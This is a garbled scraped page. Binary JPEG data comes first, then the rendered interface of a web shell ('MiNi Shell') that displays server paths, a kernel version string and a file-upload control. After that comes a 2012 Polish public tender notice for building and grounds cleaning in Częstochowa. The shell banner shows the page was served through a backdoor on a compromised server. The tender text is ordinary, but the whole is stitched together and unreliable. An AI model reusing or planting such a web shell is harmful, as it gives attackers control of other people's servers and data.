JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120514/152414-N-2012.html

<p class="kh_header"><b>Częstochowa: Stałe utrzymanie czystości wewnątrz budynków oraz terenów przynależnych do budynków, użytkowanych  i  zarządzanych  przez Zakład Gospodarki Mieszkaniowej  TBS  Sp. z o.o. w obszarach działania Oddziałów  Eksploatacji.</b><br>
<b>Numer ogłoszenia: 152414 - 2012; data zamieszczenia: 14.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej Towarzystwo Budownictwa Społecznego w Częstochowie Sp. z o.o. , ul. Polskiej Organizacji Wojskowej 24, 42-200 Częstochowa, woj. śląskie, tel. 034 3682461, faks 034 3682461, 3651290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgm-tbs.czest.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Prawa Handlowego 100%  udziałów stanowi  własność  Gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Stałe utrzymanie czystości wewnątrz budynków oraz terenów przynależnych do budynków, użytkowanych  i  zarządzanych  przez Zakład Gospodarki Mieszkaniowej  TBS  Sp. z o.o. w obszarach działania Oddziałów  Eksploatacji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest stałe utrzymanie czystości wewnątrz budynków oraz terenów przynależnych do budynków, użytkowanych i zarządzanych przez Zakład Gospodarki Mieszkaniowej TBS Sp. z o.o. w obszarach działania Oddziałów Eksploatacji.
Zamówienie zostało podzielone na zadania:
Zadanie nr 1
Stałe utrzymanie czystości wewnątrz budynków oraz terenów przynależnych do budynków, użytkowanych i zarządzanych przez Zakład Gospodarki Mieszkaniowej  TBS Sp. z o.o. - w obszarze działania:
 Oddziału Eksploatacji przy ul. Orlik -Rűckemanna 35/37 (DEO  I) 
 Oddziału Eksploatacji przy ul. Wały Dwernickiego 101/105 ( DEO II )
Wykaz budynków z uwzględnieniem powierzchni objętej utrzymaniem czystości określa załącznik nr 7 a
Zadanie nr 2 
Stałe utrzymanie czystości wewnątrz budynków oraz terenów przynależnych do budynków, użytkowanych i zarządzanych  przez Zakład Gospodarki Mieszkaniowej TBS Sp. z o.o. - w obszarze działania :
 Oddziału Eksploatacji przy Al. Niepodległości 27  (DEO  III) 
 Oddziału Eksploatacji przy ul. Tuwima 6 ( DEO V )
Wykaz budynków z uwzględnieniem powierzchni objętej utrzymaniem czystości określa załącznik nr 7b
Zadanie nr 3
Stałe utrzymanie czystości wewnątrz budynków oraz terenów przynależnych do budynków, użytkowanych i zarządzanych przez Zakład Gospodarki Mieszkaniowej TBS Sp. z o.o. - w obszarze działania :
Oddziału Eksploatacji przy ul. Nowowiejskiego 26  (DEO  IV)
Oddziału Eksploatacji przy ul. Łukasińskiego 26 ( DEO VI )
Wykaz budynków z uwzględnieniem powierzchni objętej sprzątaniem określa załącznik nr 7 c

I.1. Szczegółowy zakres prac objętych przedmiotem zamówienia dotyczący każdego  z 3-ch zadań:
Do obowiązków Wykonawcy należy:
1.Sprzątanie klatek schodowych i pomieszczeń wspólnego użytku, polegające na    (z zastrzeżeniem, że użyty w niniejszym paragrafie termin codzienne należy odnieść do dni roboczych):
a. zamiataniu klatek schodowych - codziennie do godziny 11-tej
b. zamiataniu pomieszczeń w.c. wspólnego użytku - codziennie do godziny 11-tej
c. myciu i zamiataniu kabin wind - codziennie do godziny 11-tej
d. myciu klatek schodowych, obejmującym podłogi, schody, parapety, drzwi wejściowe (do klatek schodowych, piwnic, strychów, pomieszczeń wspólnego użytku), grzejników, skrzynek listowych, lamperii, balustrad, poręczy, kloszy lamp, pomieszczeń w.c. wspólnego użytku - dwa razy  w miesiącu
e. myciu okien na klatkach schodowych i w pomieszczeniach wspólnego użytku - 1 raz na kwartał
f. zamiataniu korytarzy piwnicznych - 1 raz w miesiącu
g. sprzątaniu i zamiataniu pomieszczeń strychowych - 1 raz w miesiącu, 
h. usuwaniu zanieczyszczeń będących skutkami awarii - każdorazowo po ich powstaniu
i. usuwaniu pajęczyn - codziennie do godziny 11-tej
j. deratyzacji (środkami chemicznymi dostarczonymi przez właściwy Oddział Eksploatacji) - na żądanie Zamawiającego.
2. Sprzątanie chodników polegające na:
a. codziennym sprzątaniu - zamiataniu chodników, dróg wewnątrz osiedlowych, placów, podwórzy, bram, prześwitów, wnęk przy okienkach piwnicznych oraz podłoży osłon śmietnikowych,
b. codziennym czyszczeniu wycieraczek przed wejściami do klatek schodowych,
c. codziennym opróżnianiu ze śmieci koszy przy ławkach,
d. usuwaniu śniegu i lodu oraz posypywaniu piaskiem chodników, dojść                  do klatek schodowych i osłon śmietnikowych, dróg wewnątrz osiedlowych, oczyszczaniu ze śniegu i lodu studzienek ściekowych. Czynności te muszą być wykonane codziennie do godziny 7- ej rano. 
W przypadku ciągłych i nadmiernych opadów śniegu Wykonawca   
zobowiązany jest do wykonywania powyższych czynności na bieżąco                 
w ciągu całego dnia, również w soboty, niedziele i święta.
3. Sprzątanie terenów zielonych polegające na:
a. codziennym usuwaniu nieczystości z terenów zielonych,
b. wygrabianiu liści - zakres prac obejmuje bieżące wygrabianie liści, ich załadunek oraz wywiezienie z terenu (wybór miejsca wywózki i koszty składowania lub unieszkodliwiania obciążą Wykonawcę; na żądanie Zamawiającego Wykonawca zobowiązany jest do udokumentowania wywozu zgrabionych liści umową zawartą z firmą zajmującą się odbiorem odpadów; w przypadku wywożenia zgrabionych liści we własnym zakresie, Wykonawca zobowiązany jest do udokumentowania wywozu fakturami za ich składowanie lub unieszkodliwienie, bądź do wskazania miejsca ich składowania lub unieszkodliwiania),
c. przycinaniu krzewów, żywopłotów i odrostów przy drzewach - zakres prac obejmuje również załadunek  oraz wywiezienie z terenu (wybór miejsca wywózki i koszty składowania lub unieszkodliwiania obciążą Wykonawcę; na żądanie Zamawiającego Wykonawca zobowiązany jest do udokumentowania wywozu umową zawartą z firmą zajmującą się odbiorem odpadów; w przypadku wywożenia obciętych gałęzi krzewów, żywopłotów  i odrostów przy drzewach we własnym zakresie, Wykonawca zobowiązany jest do udokumentowania wywozu fakturami za ich składowanie lub unieszkodliwienie, bądź do wskazania miejsca ich składowania lub unieszkodliwiania),
d. koszeniu trawników 
- w roku 2012 - nie mniej niż dwukrotne koszenie trawników (w okresie od lipca do września)
- w roku 2013 - nie mniej niż jednokrotne koszenie trawników (w okresie od maja do 15 czerwca),
w terminach uzgodnionych i potwierdzonych na piśmie z właściwym Oddziałem Eksploatacji, zakres prac obejmuje koszenie trawników wraz z grabieniem i usunięciem z terenu skoszonej trawy w terminie 48 godzin od skoszenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.61.20.00-0, 90.62.00.00-9, 90.63.00.00-2, 77.31.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie (przed upływem terminu składania ofert) wadium w wysokości: 
zadanie nr 1    ( DEO I + DEO II )       - 5000 zł 
zadanie nr 2    ( DEO III + DEO V )     - 5000 zł
zadanie nr 3    ( DEO IV + DEO VI )   -  5000 zł
Razem  :       15 000 zł ( słownie: piętnaście tysięcy )
2. Wadium może być wniesione według wybory Wykonawcy:
- w pieniądzu,
- w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- w gwarancjach bankowych,
- w gwarancjach ubezpieczeniowych,
- w poręczeniach udzielanych przez podmioty, o których mowa wart. 6 ust. 3 pkt. 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dotyczy : zadania I,II,III
Ocena spełniania warunku, nastąpi wg formuły  spełnia/nie spełnia na podstawie informacji zawartych w przedłożonym wraz z oferta oświadczeniu Wykonawcy       o spełnianiu warunków  udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 1 ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dotyczy : zadania I,II,III
Ocena spełniania warunku, nastąpi wg formuły spełnia/nie spełnia na podstawie informacji zawartych w przedłożonym wraz z ofertą oświadczeniu Wykonawcy       o spełnianiu warunków  udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 1 ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dotyczy : zadania I,II,III
Ocena spełniania warunku, nastąpi wg formuły spełnia/nie spełnia na podstawie informacji zawartych w przedłożonym wraz z ofertą oświadczeniu Wykonawcy       o spełnianiu warunków  udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 1 ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dotyczy : zadania I,II,III
-   warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, ze jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż  150.000 zł (słownie: sto pięćdziesiąt tysięcy złotych) lub równowartość tej kwoty w walucie obcej, która zostanie przeliczona wg tabeli kursów NBP obowiązującej w dniu otwarcia ofert.   
Ocena spełnienia warunku, nastąpi wg formuły spełnia/nie spełnia na podstawie informacji zawartych w przedłożonym wraz z ofertą oświadczeniu i dokumentach.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony FORMULARZ OFERTY (na zadanie lub zadania, na które Wykonawca składa ofertę),
2. kosztorys (-y) ofertowy ( -e )  - załączniki 2a, 2b, 2c,
3. dokumenty i oświadczenia potwierdzające, ze wykonawca spełnia warunki udziału  w postępowaniu oraz, ze nie podlega wykluczeniu z postępowania, zgodnie z załącznik nr 3 i 4  do niniejszej specyfikacji,
4. pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania             w postępowaniu i zawarcia umowy.
5. pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika  z innych dokumentów złożonych wraz z ofertą. 
6. Dodatkowe wymagania  związane z realizacją przedmiotu zamówienia :
Na podstawie art. 29 ust. 4 ustawy Prawo zamówień publicznych Zamawiający będzie wymagał aby wśród osób bezpośrednio uczestniczących w wykonaniu zamówienia zatrudnionych było dla każdego zadania określonego w niniejszej specyfikacji  co najmniej 20 osób bezrobotnych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - ilość osób bezrobotnych  zadeklarowana przez  Wykonawcę - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgm-tbs.czest.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację można pobrać nieodpłatnie ze strony internetowej Zamawiającego. Specyfikację można również zakupić w siedzibie Zamawiającego (pokój nr 10) za cenę 20 PLN.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2012 godzina 09:00, miejsce: Oferty należy składać w siedzibie  Zamawiającego - Częstochowa, ul. POW 24 pokój nr 6 (Kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1
Stałe utrzymanie czystości wewnątrz budynków oraz terenów przynależnych do budynków, użytkowanych i zarządzanych przez Zakład Gospodarki Mieszkaniowej TBS Sp. z o.o. - w obszarze działania:
 Oddziału Eksploatacji przy ul. Orlik -Rűckemanna 35/37 (DEO  I) 
 Oddziału Eksploatacji przy ul. Wały Dwernickiego 101/105 ( DEO II ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest stałe utrzymanie czystości wewnątrz budynków oraz terenów przynależnych do budynków, użytkowanych i zarządzanych przez Zakład Gospodarki Mieszkaniowej TBS Sp. z o.o. w obszarach działania Oddziałów Eksploatacji.
Do obowiązków Wykonawcy należy:
1.Sprzątanie klatek schodowych i pomieszczeń wspólnego użytku, polegające na    (z zastrzeżeniem, że użyty w niniejszym paragrafie termin (codzienne) należy odnieść do dni roboczych):
a.zamiataniu klatek schodowych - codziennie do godziny 11-tej
b.zamiataniu pomieszczeń w.c. wspólnego użytku - codziennie do godziny 11-tej
c.myciu i zamiataniu kabin wind - codziennie do godziny 11-tej
d.myciu klatek schodowych, obejmującym podłogi, schody, parapety, drzwi wejściowe (do klatek schodowych, piwnic, strychów, pomieszczeń wspólnego użytku), grzejników, skrzynek listowych, lamperii, balustrad, poręczy, kloszy lamp, pomieszczeń w.c. wspólnego użytku - dwa razy  w miesiącu
e.myciu okien na klatkach schodowych i w pomieszczeniach wspólnego użytku - 1 raz na kwartał
f.zamiataniu korytarzy piwnicznych - 1 raz w miesiącu
g.sprzątaniu i zamiataniu pomieszczeń strychowych - 1 raz w miesiącu, 
h.usuwaniu zanieczyszczeń będących skutkami awarii - każdorazowo po ich powstaniu
i.usuwaniu pajęczyn - codziennie do godziny 11-tej
j.deratyzacji (środkami chemicznymi dostarczonymi przez właściwy Oddział Eksploatacji) - na żądanie Zamawiającego.
2.Sprzątanie chodników polegające na:
a.codziennym sprzątaniu - zamiataniu chodników, dróg wewnątrz osiedlowych, placów, podwórzy, bram, prześwitów, wnęk przy okienkach piwnicznych oraz podłoży osłon śmietnikowych,
b.codziennym czyszczeniu wycieraczek przed wejściami do klatek schodowych,
c.codziennym opróżnianiu ze śmieci koszy przy ławkach,
d.usuwaniu śniegu i lodu oraz posypywaniu piaskiem chodników, dojść                  do klatek schodowych i osłon śmietnikowych, dróg wewnątrz osiedlowych, oczyszczaniu ze śniegu i lodu studzienek ściekowych. Czynności te muszą być wykonane codziennie do godziny 7- ej rano. 
W przypadku ciągłych i nadmiernych opadów śniegu Wykonawca   
zobowiązany jest do wykonywania powyższych czynności na bieżąco                 
w ciągu całego dnia, również w soboty, niedziele i święta.
3.Sprzątanie terenów zielonych polegające na:
a.codziennym usuwaniu nieczystości z terenów zielonych,
b.wygrabianiu liści - zakres prac obejmuje bieżące wygrabianie liści, ich załadunek oraz wywiezienie z terenu (wybór miejsca wywózki i koszty składowania lub unieszkodliwiania obciążą Wykonawcę; na żądanie Zamawiającego Wykonawca zobowiązany jest do udokumentowania wywozu zgrabionych liści umową zawartą z firmą zajmującą się odbiorem odpadów; w przypadku wywożenia zgrabionych liści we własnym zakresie, Wykonawca zobowiązany jest do udokumentowania wywozu fakturami za ich składowanie lub unieszkodliwienie, bądź do wskazania miejsca ich składowania lub unieszkodliwiania),
c.przycinaniu krzewów, żywopłotów i odrostów przy drzewach - zakres prac obejmuje również załadunek  oraz wywiezienie z terenu (wybór miejsca wywózki i koszty składowania lub unieszkodliwiania obciążą Wykonawcę; na żądanie Zamawiającego Wykonawca zobowiązany jest do udokumentowania wywozu umową zawartą z firmą zajmującą się odbiorem odpadów; w przypadku wywożenia obciętych gałęzi krzewów, żywopłotów  i odrostów przy drzewach we własnym zakresie, Wykonawca zobowiązany jest do udokumentowania wywozu fakturami za ich składowanie  lub unieszkodliwienie, bądź do wskazania miejsca ich składowania lub unieszkodliwiania),
d. koszeniu trawników 
- w roku 2012 - nie mniej niż dwukrotne koszenie trawników (w okresie od lipca do września)
- w roku 2013 - nie mniej niż jednokrotne koszenie trawników (w okresie od maja do 15 czerwca),
w terminach uzgodnionych i potwierdzonych na piśmie z właściwym Oddziałem Eksploatacji, zakres prac obejmuje koszenie trawników wraz z grabieniem i usunięciem z terenu skoszonej trawy w terminie 48 godzin od skoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.61.20.00-0, 90.62.00.00-9, 90.63.00.00-2, 77.31.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. ilość osób bezrobotnych zadeklarowanych przez  Wykonawcę - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Stałe utrzymanie czystości wewnątrz budynków oraz terenów przynależnych do budynków, użytkowanych i zarządzanych  przez Zakład Gospodarki Mieszkaniowej TBS Sp. z o.o. - w obszarze działania :
 Oddziału Eksploatacji przy Al. Niepodległości 27  (DEO  III) 
 Oddziału Eksploatacji przy ul. Tuwima 6 ( DEO V ).</p>
